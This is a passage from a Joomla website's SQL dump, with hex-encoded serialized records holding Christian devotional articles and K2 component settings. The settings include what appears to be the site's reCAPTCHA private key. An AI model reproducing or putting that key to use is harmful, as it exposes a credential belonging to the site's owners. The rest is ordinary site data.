6e3d636f6d5f6b3226766965773d6974656d2669643d32333a66726f6d2d6f75722d6661746865722d732d68656172742d31322d30322d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202831322f30322f3230313729223b733a31313a226465736372697074696f6e223b733a3431393a2220446561726c792042656c6f7665642c204c696665206861732074776f2073696465732c207468652070726163746963616c207369646520616e64207468652070726f70686574696320736964652c20616e6420796f75206d75737420776f726b207468652074776f20766572792077656c6c20696e207468657365206461797320776520617265207374657070696e6720696e746f2e205768656e20796f752067657420696e746f2061207a6f6e6520616e64206974206c6f6f6b73206c696b65207468657265206973206465737472756374696f6e2061686561642c20796f752077696c6c206e65656420746f2074616b65206865656420746f207468652070726f7068657469632061742074686174206d6f6d656e742e2048616e646c696e672074686573652074776f207369646573206f66206c6966652077696c6c2068656c7020757320746f206b6e6f772074686520646966666572656e6365206265747765656e2074686520646966666572656e7420736974756174696f6e7320616e64207768617420746f20646f206174207375636820696e7374616e6365732e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30322d31322030373a33373a3430223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30322d31322030373a33373a3430223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(242, 'index.php?option=com_k2&view=item&id=24', 'index.php?option=com_k2&view=item&id=24:correct-christian', 'How To Be a Correct Christian in a World of Pollution and  Mixtures (Part 3)', ' SUBTITLE: THE IDEAL LIFESTYLE FOR A CHRISTIAN. - Romans 12:1-2 Now that we\'ve dealt with the spiritual duties of a Christian, we need to focus on the lifestyle of a true Christian. This is the point at which you differentiate yourself from the world and show them through the way you live your life what it means to be a Christian and how much it pays to serve God. ', '2017-06-25 14:18:29', 'b6186d7910ba16e86f7362641e24dbc6', 1, 1, 1, '*', '2017-02-12 07:41:57', '0000-00-00 00:00:00', '2017-02-12 07:41:57', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223234223b733a353a22616c696173223b733a31373a22636f72726563742d63687269737469616e223b733a373a2273756d6d617279223b733a3338323a223c703e5355425449544c453a2054484520494445414c204c4946455354594c4520464f5220412043485249535449414e2e202d20526f6d616e732031323a312d323c2f703e0d0a3c703e4e6f772074686174207765277665206465616c742077697468207468652073706972697475616c20647574696573206f6620612043687269737469616e2c207765206e65656420746f20666f637573206f6e20746865206c6966657374796c65206f66206120747275652043687269737469616e2e20546869732069732074686520706f696e7420617420776869636820796f7520646966666572656e746961746520796f757273656c662066726f6d2074686520776f726c6420616e642073686f77207468656d207468726f756768207468652077617920796f75206c69766520796f7572206c6966652077686174206974206d65616e7320746f20626520612043687269737469616e20616e6420686f77206d756368206974207061797320746f20736572766520476f642e3c2f703e0d0a223b733a343a22626f6479223b733a383030373a220d0a3c703e417320612043687269737469616e2c20616c74686f75676820796f757220706879736963616c206c6966652069736e277420796f7572207072696d61727920666f6375732c206974206973206572726f7220746f207468696e6b2069742073686f756c642062652069676e6f726564206569746865722e20596f7572206c6966657374796c6520617320612043687269737469616e2073686f756c6420626520616e206f7574666c6f77206f6620796f75722073706972697475616c206c69666520616e6420706572736f6e616c2077616c6b207769746820476f642ec2a03c2f703e0d0a3c703e417320612043687269737469616e20796f7527726520657870656374656420746f3a3c2f703e0d0a3c703e3c7374726f6e673e412e20414354494e47204c494b4520474f443c2f7374726f6e673e3c2f703e0d0a3c703e49e280996d206177617265207468697320736f756e6473206c696b652061206461756e74696e672065786572636973652c20627574207768617420796f752070726f6261626c79206469646e2774206b6e6f772069732074686174207468697320706f696e74206973206f6e65206f66207468652065617369657374206368616c6c656e67657320796f75276c6c206861766520746f206f766572636f6d6520617320612043687269737469616e2e204265666f726520776520676f20746f6f206661722c204c65742075732074616b652061206c6f6f6b2061742077686174206974206d65616e7320746f20616374206c696b6520476f642e20416374696e67206c696b6520476f64206d65616e7320746f2062656861766520696e20746865206d616e6e657220636f6e73697374656e74207769746820686f7720476f6420776f756c642062656861766520696e20646966666572656e7420736974756174696f6e7320796f752066696e6420796f757273656c662e204e6f772c206265686176696e6720696e20746865206d616e6e657220476f6420776f756c642062656861766520696d706c6965732074686520666f6c6c6f77696e673a3c2f703e0d0a3c703e3c7374726f6e673e692e20596f75204d75737420436172727920596f757273656c6620696e20412057617920476f6420417070726f7665732e20526f6d616e732031323a333c2f7374726f6e673e3c2f703e0d0a3c703e54686973206d65616e7320796f7520636172727920796f757273656c66207769746820726573706563742c20616e6420612073656e7365206f6620636f6e666964656e6365207468617420476f64206d61646520796f75207370656369616c2e204265206361726566756c207468617420796f7520646f6e2774206d697374616b656e6c79207374657020696e746f20707269646520626563617573652c20476f642072657369737473207468652070726f75642e20416c736f20796f75206d7573746e277420636172727920796f757273656c66207769746820616e792073656e7365206f6620696e666572696f726974792ec2a03c2f703e0d0a3c703e492077616e7420796f7520746f206c6f6f6b20636c6f73656c7920617420746869732073746174656d656e7420696e207468652061626f76652073637269707475726520e2809c6e6f7420746f207468696e6b206f662068696d73656c66206d6f726520686967686c79207468616e206865206f7567687420746f207468696e6b2062757420746f207468696e6b20736f6265726c792ee2809d20596f752070726f6261626c79206e65766572206e6f7469636564207468617420746865204269626c65206469646e27742073617920e2809c646f6e2774207468696e6b20686967686c79206f6620796f757273656c662ee2809d204974207361797320646f6e2774207468696e6b204d4f524520484947484c59207468616e20796f75206f7567687420746f2e20576f77212054686174206d65616e732057452041524520544f205448494e4b20484947484c59204f46204f555253454c564553206265636175736520476f64206d616465207573207370656369616c20616e64204865206b6e6f77732069742c2048652068617320746f6c64207573206d616e792074696d657320696e207468652073637269707475726573206576656e2044617669642077617320636f6e66757365642061626f757420476f642773206f6273657373696f6e2077697468206d616e20696e205073616c6d20383a20332d362e3c2f703e0d0a3c703e3c7374726f6e673e69692e20596f7572204472657373696e67204d75737420426520546f20476c6f7269667920476f642ec2a03c2f7374726f6e673e3c2f703e0d0a3c703e54686973206e6f74206f6e6c79206170706c69657320746f20776f6d656e2062757420746f206d656e20616c736f2e20417320612043687269737469616e206d616e20796f752063616e2774206166666f726420746f206c6f6f6b20726f7567682c20756e6b656d707420616e642077726574636865642e20476f6420697320636c6f7468656420696e20676c6f727920616e64206c6967687420616e6420796f75206d757374207265666c65637420746861742062792070757474696e67206f6e20796f7572206265737420617070656172616e636520617420616c6c2074696d65732e20466f7220776f6d656e2c20616e79206472657373207468617420796f75206b6e6f772077696c6c206d616b65206d656e207468696e6b206f662073657820726174686572207468616e20736565696e6720476f64277320676c6f727920696e20796f752073686f756c646e277420626520666f756e6420696e20796f757220706f7373657373696f6e2e2045766572797468696e6720796f752077656172206d75737420726570726573656e7420476f64277320676c6f727920616e64206272696e6720676c6f727920746f20486973206e616d652e20417320612043687269737469616e20796f752063616e277420617070656172207365647563746976652c20726f7567682c2064697274792c2073656d692f717561727465722f74687265652d71756172746572206e616b65642e20596f75206d75737420616c7761797320726570726573656e7420476f6420696e20686f7720796f75277265206472657373656420617420616c6c2074696d65732e3c2f703e0d0a3c703e3c7374726f6e673e6969692e20596f75204d7573742052656c61746520576974682050656f706c6520696e204c6f76652e204a6f686e2031353a31322c203120436f72696e746869616e732031333a20312d383c2f7374726f6e673e3c2f703e0d0a3c703e417320612043687269737469616e2c20796f75206d75737420616c77617973207472656174206f74686572732077697468206c6f766520616e6420726573706563742e20476f64206973206c6f766520616e642061732061207265666c656374696f6e206f662048696d2c20796f75206d75737420616c736f2073686f77636173652074686174206b696e64206f66206c6f766520746f2074686520776f726c642e2054616b65206e6f746520686f776576657220746861742074686973206973206e6f7420746865206b696e64206f662073656c66697368206c6f76652074686174206c6561647320746f206c757374206275742072617468657220612073656c666c657373206c6f766520616e6420636f6d70617373696f6e20666f7220612066656c6c6f77206d616e206173207365656e207768656e20476f64206761766520486973206f6e6c79206265676f7474656e20736f6e20746f2064696520666f72207468652073696e73206f6620616c6c206d656e2e3c2f703e0d0a3c703e3c7374726f6e673e422e2054414c4b204c494b4520474f442e204d6174746865772031323a33362d33373c2f7374726f6e673e3c2f703e0d0a3c703e546865206e657874207468696e6720796f75206e65656420746f20646f20697320746f20626567696e20746f2074616c6b206c696b6520476f642e20546869732069732061207665727920706f77657266756c20706f696e74206265636175736520476f64277320706f77657220697320696e2048697320776f726420616e6420476f642068617320676976656e20757320746861742070726976696c65676520746f2062652061626c6520746f2063616c6c20666f727468207468696e67732074686174206265206e6f7420696e746f206578697374656e6365207468726f75676820666169746820616e642074686520636f6e66657373696f6e206f66206f7572206d6f7574682e205768617420796f75207361792077696c6c2068617070656e20696e20796f7572206c6966652c20736f20776174636820796f757220776f72647320636c6f73656c792e20417320612043687269737469616e20796f752061726520657870656374656420746f2075736520796f757220776f726473206173206120746f6f6c20666f72206368616e676520696e2074686520776f726c642e20596f757220776f7264732064657465726d696e6520746865206f7574636f6d65206f6620796f7572206c696665207468657265666f72652063686f6f7365207468656d206361726566756c6c792e3c2f703e0d0a3c703e546865206e657874207468696e672061626f75742074616c6b696e67206c696b6520476f642069732c20476f6420646f65736e277420656e6761676520696e2069646c652074616c6b2e20476f6420646f65736e277420676f737369702c206261636b62697465206f7220636f6d706c61696e20616e642061732043687269737469616e7320796f75206172656e277420657870656374656420746f20626520666f756e64206775696c7479206f6620616e79206f662074686f7365207468696e67732e20496620796f75277265206576657220696e2061207469676874206f7220756e6661766f7261626c6520736974756174696f6e2c20696e7374656164206f6620636f6d706c61696e696e672c20796f752073686f756c642075736520796f757220776f72647320746f20696d70726f76652074686520736974756174696f6e20627920636f6e66657373696e67207768617420476f6420686173207361696420696e20746865207363726970747572657320636f6e6365726e696e6720796f7572206c6966652ec2a03c2f703e0d0a3c703e417320612043687269737469616e2c20796f757220737065656368206d75737420636f6e73697374656e746c792062652070726f73706572696e6720746865206b696e67646f6d206f6620476f6420616e642073686f756c642062652070726f66697461626c652e20496620796f75277265206576657220696e206120736974756174696f6e20696e20776869636820796f752068617665206e6f7468696e6720746f207361792c20737461727420737065616b696e6720696e20746f6e677565732ec2a03c2f703e0d0a3c703e596f7572206c696e676f206d75737420626520636c65616e20616e6420476f646c792e204d616a6f72697479206f662043687269737469616e7320746f6461792061726520736f20636f6e74616d696e6174656420627920776f726c646c792077617973207468617420756e6c65737320746865792074656c6c20796f75206469726563746c7920746861742074686579206172652043687269737469616e732c20796f7520776f6e27742062652061626c6520746f2074656c6c2066726f6d207468656972206d616e6e6572206f66207370656563682e2041206c6f74206f66207468656d2075736520666f756c20736c616e677320616e6420737765617220776f726473207468617420776f726c646c792070656f706c65207573652ec2a03c2f703e0d0a3c703e3c7374726f6e673e432e205448494e4b204c494b4520474f442050726f76657262732032333a372c205068696c69707069616e7320343a382d392c204a616d657320343a373c2f7374726f6e673e3c2f703e0d0a3c703e4974277320707265747479206f6276696f7573207468617420796f752063616e27742065766572206265636f6d65206c696b6520476f6420756e74696c20796f75207374617274207468696e6b696e67206c696b652048696d2e2041732065617379206173207468697320736f756e64732c207468696e6b696e67206c696b6520476f642069732074686520746f756768657374206f6620746865207468726565207468696e6773207765206c6f6f6b656420617420696e206265636f6d696e67206c696b6520476f642e2054686520646576696c206b6e6f7773207468652064616e676572207468617420616c6c6f77696e6720796f7520746f207468696e6b206c696b6520476f6420706f73657320746f2068696d20616e64206865276c6c20646f2065766572797468696e6720696e2068697320706f77657220746f2073746f7020796f752066726f6d207468696e6b696e6720746865207269676874207761792e204865276c6c206272696e6720616c6c20736f727473206f66206672757374726174696e672074686f75676874732c206e65676174697665206f72206c75737466756c2074686f75676874732e20466f7274756e6174656c7920666f722075732c20746865726520697320686f70652e3c2f703e0d0a3c703e5468652066756e6e79207468696e672061626f75742070656f706c65206973207468617420746865792074656e6420746f20636f6d706c6963617465206d617474657273207768656e20697420636f6d657320746f2074686520646576696c2e20546865792074656e6420746f2062656c696576652074686174207768656e20697420636f6d657320746f206465616c696e6720776974682074686520646576696c2c20796f75206861766520746f20666f6c6c6f77206120736574206f6620636f6d706c6578207374657073207768656e20616c6c206974207265616c6c792074616b657320697320746f207374616e6420696e20796f757220617574686f726974792061732061206368696c64206f6620476f6420616e64207265736973742074686520646576696c2e2054686520626573742077617920746f206b6565702074686520646576696c20617761792066726f6d20796f75722074686f7567687473206173207365656e20696e204a616d657320343a372061626f76652c20697320746f206472617720636c6f73657220746f20476f642e2054686520636c6f73657220796f752061726520746f20476f642c20746865206661727468657220796f75206172652066726f6d2074686520646576696c2ec2a03c2f703e0d0a3c703e4c6173746c792c20696620796f75206861766520616e797468696e6720696e20796f7572206c69666520746861742067697665732074686520646576696c2061206c6567616c20666f6f74686f6c6420696e20796f7572206c69666520746f206b65657020626f74686572696e6720796f752073756368206173207365637265742073696e732c20616e6420756e62726f6b656e206f6363756c74696320636f76656e616e747320e28093657370656369616c6c79206265636175736520796f7520636f6e73756c7420736f6d652073706972697475616c20736f7572636573207769746820707261637469636573207468617420617265206e6f7420686176696e6720707265636564656e636520696e20746865204269626c652d20796f75206d7573742072656e6f756e636520616e6420726570656e74206f66207468656d206174206f6e63652ec2a03c2f703e0d0a3c703e446f6ee280997420676976652074686520646576696c20616e20696e636820696e20796f7572206d696e64206f7220796f7572206c6966652e3c2f703e0d0a3c703e3c7374726f6e673e41766f6964207468652044616e676572204f662052656c6967696f75736e657373204d6174746865772031353a372d393c2f7374726f6e673e3c2f703e0d0a3c703e5768656e20476f642063726561746564206d616e2c20686973206d61696e20726561736f6e2077617320746f206372656174652070656f706c652077686f20776f756c64206861766520706572736f6e616c2066656c6c6f777368697020776974682048696d206f7574206f66207468656972206f776e206672656577696c6c2e205468652064616e676572206f662072656c6967696f75736e657373206973207468617420696e7374656164206f66207265616c697a696e6720746869732c2072656c6967696f75732070656f706c652074656c6c207468656d73656c766573207468617420616c6c20796f75206e65656420746f20706c6561736520476f6420616e6420746f2062652061207375636365737366756c2043687269737469616e20697320746f20617474656e6420636875726368206f6e206120726567756c61722062617369732c206f626579207468652054656e20436f6d6d616e646d656e747320616e64206f74686572206d6f72616c2072756c65732c20616e64207072617920696e2061206365727461696e207761792e20416c74686f7567682074686579207468696e6b2074686579e28099726520706c656173696e6720476f642c2074686579206172652061637475616c6c79206d616b696e672048696d20756e6861707079206265636175736520476f642077616e7473206f75722043687269737469616e69747920746f206265636f6d65206d756368206d6f7265207468616e206a757374206f626579696e67206120736574206f662072756c65732c206f7220747279696e6720746f206c6f6f6b20617320686f6c7920617320706f737369626c6520696e2066726f6e74206f6620796f757220706565727320616e642070656f706c652ec2a03c2f703e0d0a3c703e476f642077616e747320796f75722043687269737469616e69747920746f20626520796f7572206c6966657374796c652e205768617420796f75207361792c2065617420616e6420627265617468652c20686f7720796f752061637420616c6c207468652074696d652073686f756c64207265666c65637420476f64e2809973206e61747572652e204966206e6f742c20796f75207374696c6c20686176652061206c6f74206f6620776f726b20746f20646f2e204576656e204a6573757320726562756b65642074686520506861726973656573207365766572616c2074696d657320696e20746865204269626c6520666f72206265696e672072656c6967696f7573206879706f6372697465732e20476f642068617465732072656c6967696f6e2077697468206e6f20686561727466656c7420706572736f6e616c2072656c6174696f6e736869702c20616e64206163636f7264696e6720746f204a6573757320696e20746865207363726970747572652061626f76652c2074686f73652077686f2070726163746963652072656c6967696f6e2061742074686520636f7374206f66206120706572736f6e616c2072656c6174696f6e736869702077697468204368726973742c20776f727368697020476f6420696e207661696e2e3c2f703e0d0a3c703e416e6f7468657220636c6173736963206578616d706c65206f662074686973206973737565206973207468652073746f7279206f66204d61727920616e64204d617274686120284c756b652031303a2034302d343229204a657375732063616d6520746f204d61727920616e64204d6172746861e280997320686f7573652c20616e6420626f7468206f66207468656d2073686f7765642074776f207665727920646966666572656e742061747469747564657320746f207468652070726573656e6365206f6620746865204c6f7264204a65737573204368726973742e204d617274686120726570726573656e7473207468652072656c6967696f75732043687269737469616e2c207768696c65204d61727920746f6f6b2074686520726f6c65206f66207468652043687269737469616e2074686174207072696f726974697a65642068657220706572736f6e616c2072656c6174696f6e73686970207769746820476f642e205768656e204d61727468612077617320636f6d706c61696e696e6720746f204a657375732074686174204d617279207761736ee28099742068656c70696e67206865722c204a65737573206d61646520686572207265616c697a65207468617420616c6c2074686f7365207468696e6773207368652077617320646f696e6720616c74686f7567682074686579207765726520696d706f7274616e742c2074686579207765726520696e206e6f2077617920617320696d706f7274616e7420617320746865206d61696e207468696e672c20776869636820776173206c697374656e696e6720746f2048696d20616e642066656c6c6f777368697070696e6720776974682048696d2e20546865206c6573736f6e20626568696e6420746869732073746f72792069732074686174206966204d61727920686164206265656e206c696b65204d61727468612c20636f6f6b696e6720616e642067657474696e672065766572797468696e6720726561647920666f72204a657375732c204a6573757320776f756c64206861766520656174656e2074686520666f6f6420616e6420676f6e6520686973207761792c20627574207468657920776f756c642068617665206d69737365642074686520676c6f72696f7573206f70706f7274756e69747920746f206865617220746865206d617374657220737065616b20746f207468656d20696e20706572736f6e2e2054686174e280997320616e6f746865722064616e676572206f662072656c6967696f75736e6573733b20697420726f627320796f75206f662074686520676c6f72696f757320657870657269656e63657320796f7520776f756c6420686176652068616420696620796f7520686164206120706572736f6e616c2072656c6174696f6e73686970207769746820476f642ec2a03c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30332d30342032323a33363a3131223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c2